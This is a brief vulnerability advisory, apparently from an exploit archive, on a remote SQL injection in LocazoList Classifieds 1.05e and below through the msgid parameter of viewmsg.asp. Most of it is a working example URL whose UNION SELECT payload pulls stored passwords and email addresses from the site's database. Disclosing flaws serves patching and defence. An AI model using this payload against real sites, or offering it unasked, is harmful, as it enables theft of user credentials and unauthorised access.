LocazoList Classifieds versions 1.05e and below suffer from a remote SQL injection vulnerability in viewmsg.asp.
f5d5151f7ccfccc3288bf4c9d0c981a23c4776d3f178c9daff6ae367f702a19a
# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability
# Author : ajann
#Vulnerability;
$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT
$$$ Example:
http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X
Msgid= TopicID